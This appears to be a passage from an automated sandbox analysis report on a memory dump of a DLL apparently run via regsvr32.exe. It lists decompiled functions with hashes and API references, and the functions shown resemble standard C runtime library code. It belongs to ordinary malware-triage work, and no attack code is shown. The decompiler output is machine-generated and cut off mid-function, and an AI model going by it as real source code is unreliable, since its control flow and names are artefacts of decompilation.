Source File: 00000002.00000002.912164912.0000000073211000.00000020.00020000.sdmp, Offset: 73210000, based on PE: true

Associated: 00000002.00000002.912148247.0000000073210000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.912242033.000000007321D000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.912356560.0000000073231000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.912376187.0000000073233000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 950cfecbf76865e8294f5f34e1245bd23e80159d0c71b808e42030fbae23100c
Instruction ID: c1aae5d6927e37aa150e91ba00e8f818234a83665b1c36135bf4b99c83bed246
Opcode Fuzzy Hash: 950cfecbf76865e8294f5f34e1245bd23e80159d0c71b808e42030fbae23100c
Instruction Fuzzy Hash: 4F01D83361C3135FE21925B69F88BAB2AFAEB456B43300339E619410D4FF9358E26140

Uniqueness

Uniqueness Score: -1.00%

Function 73216479, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E73216479(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a16) {
				intOrPtr _t14;
				intOrPtr _t15;
				intOrPtr _t17;
				intOrPtr _t36;
				intOrPtr* _t38;
				intOrPtr _t39;

				_t38 = _a4;
				if(_t38 != 0) {
					__eflags =  *_t38;
					if( *_t38 != 0) {
						_t14 = E73216F05(_a16, 0, _t38, 0xffffffff, 0, 0, 0, 0);
						__eflags = _t14;
						if(__eflags != 0) {
							_t36 = _a8;
							__eflags = _t14 -  *((intOrPtr*)(_t36 + 0xc));
							if(_t14 <=  *((intOrPtr*)(_t36 + 0xc))) {
								L10:
								_t15 = E73216F05(_a16, 0, _t38, 0xffffffff,  *((intOrPtr*)(_t36 + 8)),  *((intOrPtr*)(_t36 + 0xc)), 0, 0);
								__eflags = _t15;
								if(__eflags != 0) {
									 *((intOrPtr*)(_t36 + 0x10)) = _t15 - 1;
									_t17 = 0;
									__eflags = 0;
								} else {
									E73215B5D(GetLastError());
									_t17 =  *((intOrPtr*)(E73215B93(__eflags)));
								}
								L13:
								L14:
								return _t17;
							}
							_t17 = E73216540(_t36, _t14);
							__eflags = _t17;
							if(_t17 != 0) {
								goto L13;
							}
							goto L10;
						}
						E73215B5D(GetLastError());
						_t17 =  *((intOrPtr*)(E73215B93(__eflags)));
						goto L14;
					}
					_t39 = _a8;
					__eflags =  *((intOrPtr*)(_t39 + 0xc));
					if( *((intOrPtr*)(_t39 + 0xc)) != 0) {
						L5:
						 *((char*)( *((intOrPtr*)(_t39 + 8)))) = 0;
						_t17 = 0;
						 *((intOrPtr*)(_t39 + 0x10)) = 0;
						goto L14;
					}
					_t17 = E73216540(_t39, 1);
					__eflags = _t17;
					if(_t17 != 0) {
						goto L14;
					}
					goto L5;
				}
				E73216567(_a8);
				return 0;
			}

Strings

C:\Windows\SysWOW64\regsvr32.exe, xrefs: 7321647E

Memory Dump Source

Source File: 00000002.00000002.912164912.0000000073211000.00000020.00020000.sdmp, Offset: 73210000, based on PE: true

Associated: 00000002.00000002.912148247.0000000073210000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.912242033.000000007321D000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.912356560.0000000073231000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.912376187.0000000073233000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: C:\Windows\SysWOW64\regsvr32.exe
API String ID: 0-3922119987
Opcode ID: 659cf40166d1e357246833b9b4e1785fa207a2fa20f042e01d4ea91c1754c509
Instruction ID: 901006176b21993a4bf54c070fb12fe8298ecce06c3476075cc0262e18240bb0
Opcode Fuzzy Hash: 659cf40166d1e357246833b9b4e1785fa207a2fa20f042e01d4ea91c1754c509
Instruction Fuzzy Hash: F821C5B1600207BFE7119F659E40F1F77EEAF003647144554ED2997188E770EDA087A4

Uniqueness

Uniqueness Score: -1.00%

Function 732141A4, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E732141A4(void* __ecx, signed int* _a4, intOrPtr _a8) {
				WCHAR* _v8;
				signed int _t11;
				WCHAR* _t12;
				struct HINSTANCE__* _t16;
				struct HINSTANCE__* _t18;
				signed int* _t22;
				signed int* _t26;
				struct HINSTANCE__* _t29;
				WCHAR* _t31;
				void* _t32;

				_t26 = _a4;
				while(_t26 != _a8) {
					_t11 =  *_t26;
					_t22 = 0x73231c68 + _t11 * 4;
					_t29 =  *_t22;
					if(_t29 == 0) {
						_t12 =  *(0x7321daf0 + _t11 * 4);
						_v8 = _t12;
						_t29 = LoadLibraryExW(_t12, 0, 0x800);
						if(_t29 != 0) {
							L13:
							 *_t22 = _t29;
							if( *_t22 != 0) {
								FreeLibrary(_t29);
							}
							L15:
							_t16 = _t29;
							L12:
							return _t16;
						}
						_t18 = GetLastError();
						if(_t18 != 0x57) {
							L8:
							 *_t22 = _t18 | 0xffffffff;
							L9:
							_t26 =  &(_t26[1]);
							continue;
						}
						_t31 = _v8;
						_t18 = E73215283(_t31, L"api-ms-", 7);
						_t32 = _t32 + 0xc;
						if(_t18 == 0) {
							goto L8;
						}
						_t18 = LoadLibraryExW(_t31, 0, 0);
						_t29 = _t18;
						if(_t29 != 0) {
							goto L13;
						}
						goto L8;
					}
					if(_t29 != 0xffffffff) {
						goto L15;
					}
					goto L9;
				}
				_t16 = 0;
				goto L12;
			}

APIs

FreeLibrary.KERNEL32(00000000,?,?,73214265,00000000,?,00000001,00000000,?,732142DC,00000001,FlsFree,7321DBAC,FlsFree,00000000), ref: 73214234

Strings

api-ms-, xrefs: 732141F4

Memory Dump Source

Source File: 00000002.00000002.912164912.0000000073211000.00000020.00020000.sdmp, Offset: 73210000, based on PE: true

Associated: 00000002.00000002.912148247.0000000073210000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.912242033.000000007321D000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.912356560.0000000073231000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.912376187.0000000073233000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeLibrary
String ID: api-ms-
API String ID: 3664257935-2084034818
Opcode ID: 2c1d4537689a47b2db2e79922ff8140460c93983694a2483deaaface76471e28
Instruction ID: 47e3b314d9ac0ebc8e191146c52a869404a89b72903b057714125bc4239232b0
Opcode Fuzzy Hash: 2c1d4537689a47b2db2e79922ff8140460c93983694a2483deaaface76471e28
Instruction Fuzzy Hash: F711E733E40233DBC7139A699E44B5977F8AB01B60F250220E91EEB2C0E774E99086D0

Uniqueness

Uniqueness Score: -1.00%

Function 73218D3B, Relevance: 7.7, APIs: 5, Instructions: 200
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E73218D3B(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				intOrPtr _v12;
				void* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t41;
				signed int _t49;
				void* _t51;
				signed int _t55;
				intOrPtr _t63;
				intOrPtr _t69;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr _t86;
				void* _t89;
				intOrPtr* _t91;
				intOrPtr _t93;
				void* _t94;
				void* _t95;
				signed int _t96;
				void* _t97;
				intOrPtr* _t98;
				intOrPtr* _t100;
				void* _t103;

				_push(__ecx);
				_push(__ecx);
				_t41 =  *0x73231004; // 0xa1a1754f
				_v8 = _t41 ^ _t96;
				_t93 = _a20;
				if(_t93 > 0) {
					_t69 = E7321A46C(_a16, _t93);
					_t103 = _t69 - _t93;
					_t4 = _t69 + 1; // 0x1
					_t93 = _t4;
					if(_t103 >= 0) {
						_t93 = _t69;
					}
				}
				_t88 = _a32;
				if(_a32 == 0) {
					_t88 =  *((intOrPtr*)( *_a4 + 8));
					_a32 =  *((intOrPtr*)( *_a4 + 8));
				}
				_t86 = E73216E89(_t88, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t93, 0, 0);
				_t98 = _t97 + 0x18;
				_v12 = _t86;
				if(_t86 == 0) {
					L39:
					_pop(_t89);
					_pop(_t94);
					_pop(_t71);
					return E73212813(_t46, _t71, _v8 ^ _t96, _t86, _t89, _t94);
				} else {
					_t17 = _t86 + _t86 + 8; // 0x8
					asm("sbb eax, eax");
					_t49 = _t86 + _t86 & _t17;
					if(_t49 == 0) {
						_t72 = 0;
						L15:
						if(_t72 == 0) {
							L37:
							_t95 = 0;
							L38:
							E73218D1B(_t72);
							_t46 = _t95;
							goto L39;
						}
						_t51 = E73216E89(_t88, 1, _a16, _t93, _t72, _t86);
						_t100 = _t98 + 0x18;
						if(_t51 == 0) {
							goto L37;
						}
						_t90 = _v12;
						_t95 = E7321760D(_a8, _a12, _t72, _v12, 0, 0, 0, 0, 0);
						if(_t95 == 0) {
							goto L37;
						}
						_t86 = 0x400;
						if((_a12 & 0x00000400) == 0) {
							_t31 = _t95 + _t95 + 8; // 0x8
							asm("sbb eax, eax");
							_t55 = _t95 + _t95 & _t31;
							if(_t55 == 0) {
								_t91 = 0;
								L31:
								if(_t91 == 0 || E7321760D(_a8, _a12, _t72, _v12, _t91, _t95, 0, 0, 0) == 0) {
									L36:
									E73218D1B(_t91);
									goto L37;
								} else {
									_push(0);
									_push(0);
									if(_a28 != 0) {
										_push(_a28);
										_push(_a24);
									} else {
										_push(0);
										_push(0);
									}
									_push(_t95);
									_push(_t91);
									_push(0);
									_push(_a32);
									_t95 = E73216F05();
									if(_t95 != 0) {
										E73218D1B(_t91);
										goto L38;
									} else {
										goto L36;
									}
								}
							}
							if(_t55 > 0x400) {
								_t91 = E73217F4F(_t55);
								if(_t91 == 0) {
									goto L36;
								}
								 *_t91 = 0xdddd;
								L29:
								_t91 = _t91 + 8;
								goto L31;
							}
							E7321C670(_t55);
							_t91 = _t100;
							if(_t91 == 0) {
								goto L36;
							}
							 *_t91 = 0xcccc;
							goto L29;
						}
						_t63 = _a28;
						if(_t63 == 0) {
							goto L38;
						}
						if(_t95 > _t63) {
							goto L37;
						}
						_t95 = E7321760D(_a8, _a12, _t72, _t90, _a24, _t63, 0, 0, 0);
						if(_t95 != 0) {
							goto L38;
						}
						goto L37;
					}
					if(_t49 > 0x400) {
						_t72 = E73217F4F(_t49);
						if(_t72 == 0) {
							L13:
							_t86 = _v12;
							goto L15;
						}
						 *_t72 = 0xdddd;
						L12:
						_t72 = _t72 + 8;
						goto L13;
					}
					E7321C670(_t49);
					_t72 = _t98;
					if(_t72 == 0) {
						goto L13;
					}
					 *_t72 = 0xcccc;
					goto L12;
				}
			}

APIs

__alloca_probe_16.LIBCMT ref: 73218DBF
__alloca_probe_16.LIBCMT ref: 73218E85
__freea.LIBCMT ref: 73218EF1

Part of subcall function 73217F4F: HeapAlloc.KERNEL32(00000000,73217C8E,73217C8E,?,732169BA,00000220,?,73217C8E,?,?,?,?,73219DA2,00000001,?,?), ref: 73217F81

__freea.LIBCMT ref: 73218EFA
__freea.LIBCMT ref: 73218F1F

Memory Dump Source

Source File: 00000002.00000002.912164912.0000000073211000.00000020.00020000.sdmp, Offset: 73210000, based on PE: true

Associated: 00000002.00000002.912148247.0000000073210000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.912242033.000000007321D000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.912356560.0000000073231000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.912376187.0000000073233000.00000002.00020000.sdmp Download File

Similarity

API ID: __freea$__alloca_probe_16$AllocHeap
String ID:
API String ID: 1096550386-0
Opcode ID: c59e8b2119f4943b3002f2c154fdb8d247fd1274f827cb6753fb609d0acb3185
Instruction ID: fff7f6935e7fef8c9aabdbe2b7eeda6904acd80453182d1f8069f3201b06b3c2
Opcode Fuzzy Hash: c59e8b2119f4943b3002f2c154fdb8d247fd1274f827cb6753fb609d0acb3185
Instruction Fuzzy Hash: 0751B172500317AFEB214E64CE80FAB3AEAEF84650F150169FC0697190EB74DCA087A6

Uniqueness

Uniqueness Score: -1.00%

Function 7321A2E7, Relevance: 7.5, APIs: 5, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E7321A2E7(intOrPtr* _a4) {
				intOrPtr _t6;
				intOrPtr* _t21;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t27;

				_t21 = _a4;
				if(_t21 != 0) {
					_t23 =  *_t21 -  *0x732316f8; // 0x73231748
					if(_t23 != 0) {
						E73215C03(_t7);
					}
					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0x732316fc; // 0x73232270
					if(_t24 != 0) {
						E73215C03(_t8);
					}
					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0x73231700; // 0x73232270
					if(_t25 != 0) {
						E73215C03(_t9);
					}
					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0x73231728; // 0x7323174c
					if(_t26 != 0) {
						E73215C03(_t10);
					}
					_t6 =  *((intOrPtr*)(_t21 + 0x34));
					_t27 = _t6 - "t\"#st\"#st\"#st\"#st\"#st\"#st\"#s."; // 0x73232274
					if(_t27 != 0) {
						return E73215C03(_t6);
					}
				}
				return _t6;
			}

APIs

_free.LIBCMT ref: 7321A2FF

Part of subcall function 73215C03: HeapFree.KERNEL32(00000000,00000000,?,73214E53), ref: 73215C19
Part of subcall function 73215C03: GetLastError.KERNEL32(?,?,73214E53), ref: 73215C2B

_free.LIBCMT ref: 7321A311
_free.LIBCMT ref: 7321A323
_free.LIBCMT ref: 7321A335
_free.LIBCMT ref: 7321A347

Memory Dump Source

Source File: 00000002.00000002.912164912.0000000073211000.00000020.00020000.sdmp, Offset: 73210000, based on PE: true

Associated: 00000002.00000002.912148247.0000000073210000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.912242033.000000007321D000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.912356560.0000000073231000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.912376187.0000000073233000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 5d1318072f580d9e71696ef3f2c82aec832da7d52b0dd5a964a39ee38deb0b7a
Instruction ID: ac410e433a90c54c764acad56028d98856082e33b9a7502039847d1982b51d4a
Opcode Fuzzy Hash: 5d1318072f580d9e71696ef3f2c82aec832da7d52b0dd5a964a39ee38deb0b7a
Instruction Fuzzy Hash: 65F090766047039BC644EE69E389F5B33E9EE04B607784845F45BD7580CB30F8E08AA0

Uniqueness

Uniqueness Score: -1.00%

Function 73215DF5, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 207
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E73215DF5(void* __esi, signed int* _a4, signed int _a8, intOrPtr _a12) {
				intOrPtr _v0;
				signed int _v6;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr* _v72;
				intOrPtr* _v104;
				intOrPtr* _v108;
				intOrPtr _v112;
				signed int _v124;
				struct _WIN32_FIND_DATAW _v608;
				char _v609;
				intOrPtr* _v616;
				union _FINDEX_INFO_LEVELS _v620;
				union _FINDEX_INFO_LEVELS _v624;
				union _FINDEX_INFO_LEVELS _v628;
				signed int _v632;
				union _FINDEX_INFO_LEVELS _v636;
				union _FINDEX_INFO_LEVELS _v640;
				signed int _v644;
				signed int _v648;
				union _FINDEX_INFO_LEVELS _v652;
				union _FINDEX_INFO_LEVELS _v656;
				union _FINDEX_INFO_LEVELS _v660;
				union _FINDEX_INFO_LEVELS _v664;
				signed int _v668;
				union _FINDEX_INFO_LEVELS _v672;
				union _FINDEX_INFO_LEVELS _v676;
				intOrPtr _v724;
				void* __ebx;
				void* __edi;
				intOrPtr* _t131;
				signed int _t132;
				signed int _t134;
				signed int _t139;
				signed int _t140;
				intOrPtr* _t150;
				signed int _t152;
				intOrPtr _t153;
				signed int _t157;
				signed int _t159;
				signed int _t164;
				signed int _t166;
				char _t168;
				signed char _t169;
				signed int _t175;
				union _FINDEX_INFO_LEVELS _t179;
				signed int _t185;
				union _FINDEX_INFO_LEVELS _t188;
				intOrPtr* _t196;
				signed int _t199;
				intOrPtr _t204;
				signed int _t206;
				signed int _t209;
				signed int _t211;
				signed int _t212;
				signed int _t213;
				signed int _t215;
				signed int _t217;
				signed int _t218;
				signed int* _t219;
				signed int _t222;
				void* _t225;
				union _FINDEX_INFO_LEVELS _t226;
				void* _t227;
				intOrPtr _t229;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				signed int _t236;
				intOrPtr* _t239;
				signed int _t241;
				intOrPtr* _t244;
				signed int _t249;
				signed int _t255;
				signed int _t257;
				signed int _t263;
				intOrPtr* _t264;
				signed int _t272;
				signed int _t274;
				intOrPtr* _t275;
				void* _t277;
				signed int _t280;
				signed int _t283;
				signed int _t285;
				intOrPtr _t287;
				void* _t288;
				signed int* _t292;
				signed int _t293;
				signed int _t295;
				signed int _t296;
				signed int _t297;
				signed int _t299;
				void* _t300;
				void* _t301;
				signed int _t302;
				void* _t306;
				signed int _t307;
				void* _t308;
				void* _t309;
				void* _t310;
				signed int _t311;
				void* _t312;
				void* _t313;

				_t131 = _a8;
				_t309 = _t308 - 0x28;
				_push(__esi);
				_t317 = _t131;
				if(_t131 != 0) {
					_t292 = _a4;
					_t222 = 0;
					 *_t131 = 0;
					_t283 = 0;
					_t132 =  *_t292;
					_t232 = 0;
					_v608.cAlternateFileName = 0;
					_v40 = 0;
					_v36 = 0;
					__eflags = _t132;
					if(_t132 == 0) {
						L9:
						_v8 = _t222;
						_t134 = _t232 - _t283;
						_t293 = _t283;
						_v12 = _t293;
						_t271 = (_t134 >> 2) + 1;
						_t136 = _t134 + 3 >> 2;
						__eflags = _t232 - _t293;
						_v16 = (_t134 >> 2) + 1;
						asm("sbb esi, esi");
						_t295 =  !_t293 & _t134 + 0x00000003 >> 0x00000002;
						__eflags = _t295;
						if(_t295 != 0) {
							_t213 = _t283;
							_t280 = _t222;
							do {
								_t264 =  *_t213;
								_t20 = _t264 + 1; // 0x1
								_v20 = _t20;
								do {
									_t215 =  *_t264;
									_t264 = _t264 + 1;
									__eflags = _t215;
								} while (_t215 != 0);
								_t222 = _t222 + 1 + _t264 - _v20;
								_t213 = _v12 + 4;
								_t280 = _t280 + 1;
								_v12 = _t213;
								__eflags = _t280 - _t295;
							} while (_t280 != _t295);
							_t271 = _v16;
							_v8 = _t222;
							_t222 = 0;
							__eflags = 0;
						}
						_t296 = E73214B01(_t136, _t271, _v8, 1);
						_t310 = _t309 + 0xc;
						__eflags = _t296;
						if(_t296 != 0) {
							_v12 = _t283;
							_t139 = _t296 + _v16 * 4;
							_t233 = _t139;
							_v28 = _t139;
							_t140 = _t283;
							_v16 = _t233;
							__eflags = _t140 - _v40;
							if(_t140 == _v40) {
								L24:
								_v12 = _t222;
								 *_a8 = _t296;
								_t297 = _t222;
								goto L25;
							} else {
								_t274 = _t296 - _t283;
								__eflags = _t274;
								_v32 = _t274;
								do {
									_t150 =  *_t140;
									_t275 = _t150;
									_v24 = _t150;
									_v20 = _t275 + 1;
									do {
										_t152 =  *_t275;
										_t275 = _t275 + 1;
										__eflags = _t152;
									} while (_t152 != 0);
									_t153 = _t275 - _v20 + 1;
									_push(_t153);
									_v20 = _t153;
									_t157 = E73218B17(_t233, _v28 - _t233 + _v8, _v24);
									_t310 = _t310 + 0x10;
									__eflags = _t157;
									if(_t157 != 0) {
										_push(_t222);
										_push(_t222);
										_push(_t222);
										_push(_t222);
										_push(_t222);
										E73215AE6();
										asm("int3");
										_t306 = _t310;
										_push(_t233);
										_t239 = _v72;
										_t65 = _t239 + 1; // 0x1
										_t277 = _t65;
										do {
											_t159 =  *_t239;
											_t239 = _t239 + 1;
											__eflags = _t159;
										} while (_t159 != 0);
										_push(_t283);
										_t285 = _a8;
										_t241 = _t239 - _t277 + 1;
										_v12 = _t241;
										__eflags = _t241 -  !_t285;
										if(_t241 <=  !_t285) {
											_push(_t222);
											_push(_t296);
											_t68 = _t285 + 1; // 0x1
											_t225 = _t68 + _t241;
											_t300 = E73215BA6(_t225, 1);
											__eflags = _t285;
											if(_t285 == 0) {
												L40:
												_push(_v12);
												_t225 = _t225 - _t285;
												_t164 = E73218B17(_t300 + _t285, _t225, _v0);
												_t311 = _t310 + 0x10;
												__eflags = _t164;
												if(_t164 != 0) {
													goto L45;
												} else {
													_t229 = _a12;
													_t206 = E732163E7(_t229);
													_v12 = _t206;
													__eflags = _t206;
													if(_t206 == 0) {
														 *( *(_t229 + 4)) = _t300;
														_t302 = 0;
														_t77 = _t229 + 4;
														 *_t77 =  *(_t229 + 4) + 4;
														__eflags =  *_t77;
													} else {
														E73215C03(_t300);
														_t302 = _v12;
													}
													E73215C03(0);
													_t209 = _t302;
													goto L37;
												}
											} else {
												_push(_t285);
												_t211 = E73218B17(_t300, _t225, _a4);
												_t311 = _t310 + 0x10;
												__eflags = _t211;
												if(_t211 != 0) {
													L45:
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													E73215AE6();
													asm("int3");
													_push(_t306);
													_t307 = _t311;
													_t312 = _t311 - 0x298;
													_t166 =  *0x73231004; // 0xa1a1754f
													_v124 = _t166 ^ _t307;
													_t244 = _v108;
													_t278 = _v104;
													_push(_t225);
													_push(0);
													_t287 = _v112;
													_v724 = _t278;
													__eflags = _t244 - _t287;
													if(_t244 != _t287) {
														while(1) {
															_t204 =  *_t244;
															__eflags = _t204 - 0x2f;
															if(_t204 == 0x2f) {
																break;
															}
															__eflags = _t204 - 0x5c;
															if(_t204 != 0x5c) {
																__eflags = _t204 - 0x3a;
																if(_t204 != 0x3a) {
																	_t244 = E73218B70(_t287, _t244);
																	__eflags = _t244 - _t287;
																	if(_t244 != _t287) {
																		continue;
																	}
																}
															}
															break;
														}
														_t278 = _v616;
													}
													_t168 =  *_t244;
													_v609 = _t168;
													__eflags = _t168 - 0x3a;
													if(_t168 != 0x3a) {
														L56:
														_t226 = 0;
														__eflags = _t168 - 0x2f;
														if(__eflags == 0) {
															L59:
															_t169 = 1;
														} else {
															__eflags = _t168 - 0x5c;
															if(__eflags == 0) {
																goto L59;
															} else {
																__eflags = _t168 - 0x3a;
																_t169 = 0;
																if(__eflags == 0) {
																	goto L59;
																}
															}
														}
														_v676 = _t226;
														_v672 = _t226;
														_push(_t300);
														asm("sbb eax, eax");
														_v668 = _t226;
														_v664 = _t226;
														_v644 =  ~(_t169 & 0x000000ff) & _t244 - _t287 + 0x00000001;
														_v660 = _t226;
														_v656 = _t226;
														_t175 = E73215DD6(_t244 - _t287 + 1, _t287,  &_v676, E732162F2(_t278, __eflags));
														_t313 = _t312 + 0xc;
														asm("sbb eax, eax");
														_t179 = FindFirstFileExW( !( ~_t175) & _v668, _t226,  &_v608, _t226, _t226, _t226);
														_t301 = _t179;
														__eflags = _t301 - 0xffffffff;
														if(_t301 != 0xffffffff) {
															_t249 =  *((intOrPtr*)(_v616 + 4)) -  *_v616;
															__eflags = _t249;
															_v648 = _t249 >> 2;
															do {
																_v640 = _t226;
																_v636 = _t226;
																_v632 = _t226;
																_v628 = _t226;
																_v624 = _t226;
																_v620 = _t226;
																_t185 = E73215D07( &(_v608.cFileName),  &_v640,  &_v609, E732162F2(_t278, __eflags));
																_t313 = _t313 + 0x10;
																asm("sbb eax, eax");
																_t188 =  !( ~_t185) & _v632;
																__eflags =  *_t188 - 0x2e;
																if( *_t188 != 0x2e) {
																	L67:
																	_push(_v616);
																	_push(_v644);
																	_push(_t287);
																	_push(_t188);
																	L33();
																	_t313 = _t313 + 0x10;
																	_v652 = _t188;
																	__eflags = _t188;
																	if(_t188 != 0) {
																		__eflags = _v620 - _t226;
																		if(_v620 != _t226) {
																			E73215C03(_v632);
																			_t188 = _v652;
																		}
																		_t226 = _t188;
																	} else {
																		goto L68;
																	}
																} else {
																	_t255 =  *((intOrPtr*)(_t188 + 1));
																	__eflags = _t255;
																	if(_t255 == 0) {
																		goto L68;
																	} else {
																		__eflags = _t255 - 0x2e;
																		if(_t255 != 0x2e) {
																			goto L67;
																		} else {
																			__eflags =  *((intOrPtr*)(_t188 + 2)) - _t226;
																			if( *((intOrPtr*)(_t188 + 2)) == _t226) {
																				goto L68;
																			} else {
																				goto L67;
																			}
																		}
																	}
																}
																L76:
																FindClose(_t301);
																goto L77;
																L68:
																__eflags = _v620 - _t226;
																if(_v620 != _t226) {
																	E73215C03(_v632);
																}
																__eflags = FindNextFileW(_t301,  &_v608);
															} while (__eflags != 0);
															_t196 = _v616;
															_t257 = _v648;
															_t278 =  *_t196;
															_t199 =  *((intOrPtr*)(_t196 + 4)) -  *_t196 >> 2;
															__eflags = _t257 - _t199;
															if(_t257 != _t199) {
																E73218620(_t278, _t278 + _t257 * 4, _t199 - _t257, 4, E73215C3D);
															}
															goto L76;
														} else {
															_push(_v616);
															_push(_t226);
															_push(_t226);
															_push(_t287);
															L33();
															_t226 = _t179;
														}
														L77:
														__eflags = _v656;
														_pop(_t300);
														if(_v656 != 0) {
															E73215C03(_v668);
														}
														_t190 = _t226;
													} else {
														_t190 = _t287 + 1;
														__eflags = _t244 - _t287 + 1;
														if(_t244 == _t287 + 1) {
															_t168 = _v609;
															goto L56;
														} else {
															_push(_t278);
															_push(0);
															_push(0);
															_push(_t287);
															L33();
														}
													}
													_pop(_t288);
													__eflags = _v16 ^ _t307;
													_pop(_t227);
													return E73212813(_t190, _t227, _v16 ^ _t307, _t278, _t288, _t300);
												} else {
													goto L40;
												}
											}
										} else {
											_t209 = 0xc;
											L37:
											return _t209;
										}
									} else {
										goto L23;
									}
									goto L81;
									L23:
									_t212 = _v12;
									_t263 = _v16;
									 *((intOrPtr*)(_v32 + _t212)) = _t263;
									_t140 = _t212 + 4;
									_t233 = _t263 + _v20;
									_v16 = _t233;
									_v12 = _t140;
									__eflags = _t140 - _v40;
								} while (_t140 != _v40);
								goto L24;
							}
						} else {
							_t297 = _t296 | 0xffffffff;
							_v12 = _t297;
							L25:
							E73215C03(_t222);
							_pop(_t234);
							goto L26;
						}
					} else {
						while(1) {
							_v8 = 0x3f2a;
							_v6 = _t222;
							_t217 = E73218B30(_t132,  &_v8);
							_t234 =  *_t292;
							__eflags = _t217;
							if(_t217 != 0) {
								_push( &(_v608.cAlternateFileName));
								_push(_t217);
								_push(_t234);
								L46();
								_t309 = _t309 + 0xc;
								_v12 = _t217;
								_t297 = _t217;
							} else {
								_t218 =  &(_v608.cAlternateFileName);
								_push(_t218);
								_push(_t222);
								_push(_t222);
								_push(_t234);
								L33();
								_t297 = _t218;
								_t309 = _t309 + 0x10;
								_v12 = _t297;
							}
							__eflags = _t297;
							if(_t297 != 0) {
								break;
							}
							_t292 =  &(_a4[1]);
							_a4 = _t292;
							_t132 =  *_t292;
							__eflags = _t132;
							if(_t132 != 0) {
								continue;
							} else {
								_t283 = _v608.cAlternateFileName;
								_t232 = _v40;
								goto L9;
							}
							goto L81;
						}
						_t283 = _v608.cAlternateFileName;
						L26:
						_t272 = _t283;
						_v32 = _t272;
						__eflags = _v40 - _t272;
						asm("sbb ecx, ecx");
						_t236 =  !_t234 & _v40 - _t272 + 0x00000003 >> 0x00000002;
						__eflags = _t236;
						_v28 = _t236;
						if(_t236 != 0) {
							_t299 = _t236;
							do {
								E73215C03( *_t283);
								_t222 = _t222 + 1;
								_t283 = _t283 + 4;
								__eflags = _t222 - _t299;
							} while (_t222 != _t299);
							_t283 = _v608.cAlternateFileName;
							_t297 = _v12;
						}
						E73215C03(_t283);
						goto L31;
					}
				} else {
					_t219 = E73215B93(_t317);
					_t297 = 0x16;
					 *_t219 = _t297;
					E73215AD6();
					L31:
					return _t297;
				}
				L81:
			}

APIs

_free.LIBCMT ref: 73215F8F

Strings

*?, xrefs: 73215E38

Memory Dump Source

Source File: 00000002.00000002.912164912.0000000073211000.00000020.00020000.sdmp, Offset: 73210000, based on PE: true

Associated: 00000002.00000002.912148247.0000000073210000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.912242033.000000007321D000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.912356560.0000000073231000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.912376187.0000000073233000.00000002.00020000.sdmp Download File

Similarity

API ID: _free
String ID: *?
API String ID: 269201875-2564092906
Opcode ID: 64ce4d84af9dd0348b0bdc1ed56a3b0106e437a61b3be5bb0858fc8ce406034e
Instruction ID: 61456f103ad2eb259865d7599c88e49c2ddc9919b6b7af1560c823bba703a073
Opcode Fuzzy Hash: 64ce4d84af9dd0348b0bdc1ed56a3b0106e437a61b3be5bb0858fc8ce406034e
Instruction Fuzzy Hash: 0C6132B5D0021A9FDB15CFACC9806DEFBF9EF48310B2841AAE815E7340D7759E918B90

Uniqueness

Uniqueness Score: -1.00%

Function 73215D07, Relevance: 6.1, APIs: 4, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E73215D07(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a16) {
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t19;
				intOrPtr _t29;
				char _t31;
				intOrPtr _t38;
				intOrPtr* _t40;
				intOrPtr _t41;

				_t40 = _a4;
				if(_t40 != 0) {
					_t31 = 0;
					__eflags =  *_t40;
					if( *_t40 != 0) {
						_t16 = E73216F05(_a16, 0, _t40, 0xffffffff, 0, 0, 0, 0);
						__eflags = _t16;
						if(__eflags != 0) {
							_t38 = _a8;
							__eflags = _t16 -  *((intOrPtr*)(_t38 + 0xc));
